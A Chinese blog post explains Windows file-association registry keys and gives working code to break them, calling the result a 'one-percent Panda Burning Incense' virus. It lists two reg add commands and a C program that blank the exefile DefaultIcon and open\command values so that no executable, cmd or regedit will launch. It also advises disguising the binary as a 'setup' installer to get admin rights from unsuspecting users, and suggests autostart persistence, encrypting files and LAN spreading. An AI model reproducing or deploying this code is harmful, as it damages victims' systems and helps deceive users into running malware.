病毒:注册表的认识以及用c语言编写一个“百分之一熊猫烧香“

已于 2022-08-27 10:21:06 修改
阅读量659 收藏 6
点赞数 8
分类专栏: 病毒 文章标签: 编程语言
于 2020-10-26 19:25:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18741387/article/details/109295060
版权

好久不更新了,这次来点干货.
众所周知,熊猫烧香是一个威力强大的病毒.曾经的电脑只要被感染以后就只有重装系统这条路.
当然,现在可能对这种病毒已经有所防御,所以威胁没有以前那么大了.
熊猫烧香一个比较明显的特点就是会感染所有exe可执行文件.
当然,其他一些功能也很牛逼,但是无奈我水平有限,目前只能做到感染exe文件.不过如果你们愿意,可以将电脑上的任何类型文件进行感染,我这次仅仅是用exe文件做示范.

一.预先要知道的东西

我们这个病毒实现的原理是对注册表进行下手.
众所周知,注册表是系统的核心,我们所有的设置都保存在注册表里面.因此,没事干千万不要乱动注册表.
我们在"运行"中输入"regedt"即可打开注册表.如图.
在这里插入图片描述
要想学习注册表,我可以教你们个方法:直接将图中的每一个项的名称去百度,第一条里面就写的很详细,每个项时干什么的都会有.
比如我想直到HKEY_CLASSES_ROOT这一项的详细作用,就可以直接搜这个,如图.
在这里插入图片描述
百度百科写的很详细了已经,所以我就不赘述了.
当然,学习一定要有总结的习惯.下图是我在学习注册表的时候总结的一些比较关键的东西.如图.
在这里插入图片描述
这里面包括了病毒启动项的位置,以及各种可能用的到的地方.这个就看你们的脑洞了.
现在想一个问题:
当你点开一个exe程序或者一个txt文本的时候,系统是怎么知道你点开的是什么呢?它怎么知道txt文本是用文本编辑器打开呢?
原因就是我们的注册表.
我们的注册表里面的某个位置对我们按照某个程序打开文件的操作进行了记录.
比如,我们想知道.exe程序是以什么方式打开,我们可以查看一下位置:
HKEY_CLASSES_ROOT.exe
在这里插入图片描述
可以看到默认里面写了个exefile.我们继续寻找exefile.
在这里插入图片描述

我们看到exefile下面有三个子项.
第一个DefualtIcon代表程序图标是什么.
第二个shell/open/command代表打开程序会执行什么命令.
第三个我们不用关心.
这里有个很好的例子,说的是当你自己新建一个随便的后缀名,然后想以某个程序打开,如何进行注册表的修改.
链接附上.
https://blog.csdn.net/a302549450/article/details/84308175
这个是必须要看的.我们后面的东西就是根据这个基础做出来的,大家可以在自己的虚拟机上试一下.

二.使用命令修改注册表

cmd中专门有一个命令是进行修改注册表.名称是reg.我们可以看下用法.
在这里插入图片描述
可以看到有12个参数.我们用到的是add这个修改参数.
比如,我们想将exe文件的图标改没,可以这样写:

reg add HKEY_CLASSES_ROOT\exefile\DefaultIcon /ve /d "" /f

我解释一下这个命令.
reg add就不用说了,在注册表中添加的意思.
HKEY_CLASSES_ROOT\exefile\DefaultIcon,是exe文件图标的引用位置.
/ve,使用默认名新建值.
/d “”,设置新建项的值.
/f,不用进行确实强行写入.
当然,我们这个是将原来的值覆盖了,不能叫做新建.
执行结果我懒得截图了,你们自己想象吧.其他参数你们也可以进行一下研究,都很有意思.

改图标的我这头不知道为什么没有实现成功.原因我也不太清楚,你们可以自己想想为什么.
或许是需要重启一下?我也没试

三.病毒实现效果

先放结果图.执行以后,随便点一个exe程序,就会出现打不开exe文件的情况.
在这里插入图片描述
我试了试注册表,好吧,也打不开了.
在这里插入图片描述
很尴尬的是…cmd也打不开了,本来还想用命令恢复,看来也不行了.
在这里插入图片描述
我想到的解决方法就是进入安全模式,或者是重装系统等等.
由于是我win7虚拟机,所以我直接恢复镜像了.
这里先说明一下原理.
我们的注册表中记录了所有我们系统的配置信息.
当我们修改上面我给出位置的信息的时候,将command的值改成空,当我们执行exe文件的时候系统就不知道改用什么打开了,所以会报错.
我这个仅仅是进行了一个简单的修改,如果你比较狠,甚至直接将注册表删掉都行,这样电脑就直接废了,连机都开不了.
你还可以改些别的,比如我在开始给的图片中某条记录是关于你电脑中的所有win32程序的安装位置.根据这个,我们是不是还可以干点别的坏事呢?
把这些学明白了,简直为所欲为了,哈哈.

四.命令

一共是两条.

reg add HKEY_CLASSES_ROOT\\exefile\\DefaultIcon /ve /d "" /f
reg add HKEY_CLASSES_ROOT\\exefile\\shell\\open\\command /ve /d "" /f

具体我就不解释了,上面有.
这两条命令执行以后,就会出现如图的效果.
当然,这个是有限制的,需要以管理员身份运行.不过在win2003上面是没有限制的,win7有,其他系统我没测试.
我倒是想到了一个解决方法,后面我会写.

五.C代码实现

会c语言的都知道system命令吧?我之前有一篇文章里面做了三个小病毒,原理就是这个.不说废话,直接上代码.

#include <stdio.h>
#include <stdlib.h>
int main(){
    system("reg add HKEY_CLASSES_ROOT\\exefile\\DefaultIcon /ve /d \"\" /f");
    system("reg add HKEY_CLASSES_ROOT\\exefile\\shell\\open\\command /ve /d \"\" /f");
    return 0;
}

由于需要考虑到转义字符的关系,所以我将cmd命令稍微修改了一下.
还记得那会儿说的关于管理员的事情吗?
我试了一下,如果不以管理员方式打开,会出现以下提示:
在这里插入图片描述
仅仅以右键管理员方式打开才能正常运行.但是哪个人看到这个不会怀疑呢?
所以我想到了windows系统的一个特点:会把包含setup文件名的文件当作安装程序.
因此,我们把文件改成包含setup文件名即可,然后点击运行.
在这里插入图片描述
当然,仍然会提示需要管理员权限,但是这样不是正常了很多么?
许多软件安装的时候都是这样,所以一般人没人会想到这是个病毒程序.

好了,就先写这么多吧.
在HKEY_CLASSES_ROOT里面的后缀名都是可以修改的,你可以写个程序,先读取注册表中所有的后缀,然后按照上面的方法进行修改,这样改完电脑上面的任何文件都无法打开.
你还可以将这个程序添加到注册表中的启动项中,之后对文件进行一个加密,又或者写个扫描器然后对局域网内的电脑进行传播,等等等等…
想想就妙,恐怕半夜都能笑出来,哈哈哈哈哈哈
剩下的有机会在写吧,这次就写这么多了.
这个病毒算是一个效果还不错的病毒.
由于我是模仿熊猫烧香做的,所以我起名叫做"百分之一熊猫烧香",算是对大佬的致敬.

薯片薯条
关注
专栏目录
c语言熊猫病毒源代码,病毒:注册表认识以及用c语言编写一个百分之一熊猫烧香”...
weixin_32389427的博客
05-22 1438
众所周知,熊猫烧香一个威力强大的病毒.曾经的电脑只要被感染以后就只有重装系统这条路. 当然,现在可能对这种病毒已经有所防御,所以威胁没有以前那么大了. 熊猫烧香一个比较明显的特点就是会感染所有exe可执行文件. 当然,其他一些功能也很牛逼,但是无奈我水平有限,目前只能做到感染exe文件.不过如果你们愿意,可以将电脑上的任何类型文件进行感染,我这次仅仅是用exe文件做示范.一.预先要知道的东西我们...
熊猫烧香C语言源代码,熊猫烧香病毒源代码 1.0 完整版 (图文)
热门推荐
weixin_28885791的博客
05-22 1万+
熊猫烧香”是一种可经过多次变种的蠕虫病毒变种形态,新云软件园提供熊猫烧香病毒源代码下载,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。源码分析大体的看了下,主要是通过拷贝...
病毒:注册表认识以及用c语言编写一个百分之一熊猫烧香
MachineGunJoe666
04-16 658
众所周知,熊猫烧香一个威力强大的病毒.曾经的电脑只要被感染以后就只有重装系统这条路. 当然,现在可能对这种病毒已经有所防御,所以威胁没有以前那么大了. 熊猫烧香一个比较明显的特点就是会感染所有exe可执行文件. 当然,其他一些功能也很牛逼,但是无奈我水平有限,目前只能做到感染exe文件.不过如果你们愿意,可以将电脑上的任何类型文件进行感染,我这次仅仅是用exe文件做示范. 一.预先要知道的东西 我们这个病毒实现的原理是对注册表进行下手. 众所周知,注册表是系统的核心,我们所有的设置都保存在..
熊猫烧香C语言源代码,熊猫烧香病毒是不是用C语言编的
weixin_39564368的博客
05-22 1212
满意答案5li73qyb2013.04.08采纳率:55%等级:12已帮助:10174人是delphi写的听说C#牛的话也可以写“熊猫烧香”,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有...
C语言怎么实现熊猫上香中的系统错误提示,熊猫烧香病毒是用什么程序语言编写原理是什么...
weixin_39821189的博客
05-18 1118
不知道大家是否还记得几年前轰动全国的熊猫烧香这个计算机病毒,那么你知道熊猫烧香病毒是用什么语言写的?原理是什么?熊猫烧香病毒是使用C++程序语言编写的,是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有...
c语言制作电脑病毒原理,用C语言编写的简单病毒
weixin_39931390的博客
05-22 4983
此实验代码请务必在Vmware中执行,不要在真机上进行实验,否则会很麻烦。本实验的设计是基于C语言的恶意代码,其执行过程如下:1. 首次执行该病毒时,如果检测到注册表的任务管理器未禁用,则该病毒依次执行以下功能:创建一个启动项,将文件复制到系统目录路径下,并将其用作自动启动路径;禁用任务管理器;禁用注册表编辑器;获取图片并修改桌面背景(重新引导生效);修改注册表以将用户键盘输入阻止为1(重新启动生...
:package:用Go语言编写的替代npm注册表-Golang开发
05-26
nerva(PoC)nerva是一个RESTful的package.json感知注册表服务器。 它旨在提供一种快速,易于维护的npm替代方案。 注册表服务器既可以作为面向公众的服务运行,也可以作为私有主机运行。faci nerva(PoC)nerva是一...
熊猫烧香病毒代码
最新发布
2301_81967414的博客
12-28 1043
if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染。if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染。if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记。else if Ext = '.ADC' then //Foxmail地址自动完成文件。else if Ext = '.WAB' then //Outlook地址簿文件。
【警惕注册表中的木马病毒
南山鹿场
06-30 1247
尽管如今杀毒软件已经够厉害了,但似乎还是抵挡不住病毒和木马的侵扰,特别是注册表,经常黑客或者病毒会通过它进入系统使我们财产受损,因此要警惕注册表中的病毒和木马,可是该怎么查杀呢?   一款好的杀毒软件和安全软件是怎么做出来的?   是根据流氓软件、病毒木马的行为习惯加以分析,对起可能利用的漏洞或者隐身场所加以防范。   一款“毒”的恶意软件病毒木马是怎么做出来的?   是根
C语言怎么实现熊猫上香中的系统错误提示,病毒分析(三)-利用Process Monitor对熊猫烧香病毒进行行为分析...
weixin_28543661的博客
05-18 257
前两次随笔我介绍了手动查杀病毒的步骤,然而仅通过手动查杀根本无法仔细了解病毒样本的行为,这次我们结合Process Monitor进行动态的行为分析。Process MonitorProcess Monitor一款系统进程监视软件,总体来说,Process Monitor相当于Filemon+Regmon,其中的Filemon专门用来监视系统 中的任何文件操作过程,而Regmon用来监视注册表的读...
注册表清除计算机病毒
编程爱好者
03-01 915
【IT168 实用技巧】木马藏身地及通用排查技术  木马取自古希腊神话的特洛伊木马记,是一种基于远程控制的黑客工具,具有很强的隐藏性和危害性。为了达到控制服务端主机的目的,木马往往要采用各种手段达到激活自己,加载运行的目的。这里,我们简要的介绍一下木马通用的激活方式,它们的藏身地,并通过一些实例来让您体会一下手动清除木马的方法。  ●在Win.ini中启动木马:  在Win.ini的[Window
熊猫烧香代码_此功能可以使您的熊猫代码明显更快
weixin_26731327的博客
08-31 397
熊猫烧香代码Pandas is an awesome library, but it’s not the fastest. There are ways of making it faster though, and that is by using the right tool for the right task. Today we’ll explore one of these tools,...
注意Windows注册表里加载的病毒和流氓软件!
leehq的专栏
09-01 6279
现在恶意和带毒的网站越来越多,让人防不胜防。而各种恶意软件要寄生在Windows系统中,最常用的手段就是修改注册表。由于Windows的注册表里加载程序的项目繁多,因此查找起来相当困难。总结我帮人清除病毒的经历,发现以下注册表项最容易让病毒利用。 1. 通过IE加载HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Ex
注册表清除计算机病毒(转)
cuankuangzhong6373的博客
07-11 568
木马藏身地及通用排查技术  木马取自古希腊神话的特洛伊木马记,是一种基于远程控制的黑客工具,具有很强的隐藏性和危害性。为了达到控制服务端主机的目的,木马往往要采用各种手段达到激活自己,加载运行的目的。这里,我们简要的介绍一下木马...
注册表防注入病毒
jasdhasd的博客
07-25 881
注册表的简单介绍 注册表是windows操作系统中的一个核心数据库,其中存放着各种参数,直接控制着windows的启动、硬件驱动程序的装载以及一些windows应用程序的运行,从而在整个系统中起着核心作用。这些作用包括了软、硬件的相关配置和状态信息,比如注册表中保存有应用程序和资源管理器外壳的初始条件、首选项和卸载数据等,联网计算机的整个系统的设置和各种许可,文件扩展名与应用程序的关联,硬件部件...
实验一——病毒注册表操作
Onlyone_1314的博客
09-20 9197
【实验内容】 (1)强制隐藏.exe文件的扩展名 刚开始应用程序的exe扩展名都是可见的 1、注册表项:HKEY_CLASS_ROOT\exefile, 2、新建字符串值:取名为NeverShowExt。 用Mytool工具: 直接在注册表中添加 3、重启计算机 重启之后,所有exe文件的扩展名都被隐藏。 (2)隐藏“文件夹选项”子菜单项 刚开始“文件夹选项”子菜单选项是可以用的 1、注册表项\HKEY_CURRENT_USER\Software\Microsoft\Windows\Current
操作注册表删除病毒
edg_edu的专栏
04-06 1533
病毒名称:传奇终结者变种JKE (Trojan.PSW.LMir.jke) 病毒类型:盗号木马 病毒发作现象及危害: 病毒采用VC++语言编写,Aspack加壳。运行后,会在后台悄悄运行,窃取《传奇》游戏玩家的用户名、密 码、登陆服务器、用户所属区域等信息,并把这些资料发送给病毒散布者。该病毒还可能造成IE浏览器以 及其他一些软件出现故障,无法使用。 如何判断是否感染此木马病毒: 该病毒
一般的病毒通过注册表自启动的方式不断完善中。。。。
积累点滴,保持自我
03-03 2145
我们都知道病毒存在很大的隐藏性,流氓性,它总是在不知不觉中就在你的电脑上运行为非作歹,现在就把目前知道的几种病毒在电脑中自启动的两种方式记录一下。现在知道的这两种都是病毒通过注册表的形式自启动。 第一种:注册表:HKEY_LOCAL_MACHINE\SOFTWARE\Classs\exefile\shell\open\command  中的一项  数据处填写的是"%1" %*   这个格式是可
手动清理病毒注册表、隐藏文件与DLL处理指南
首先,对于注册表启动项的清理,许多病毒会利用这个位置进行隐藏,通过打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN,查看并可能删除可疑内容,但需注意,这种方法只能暂时阻止病毒启动,...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值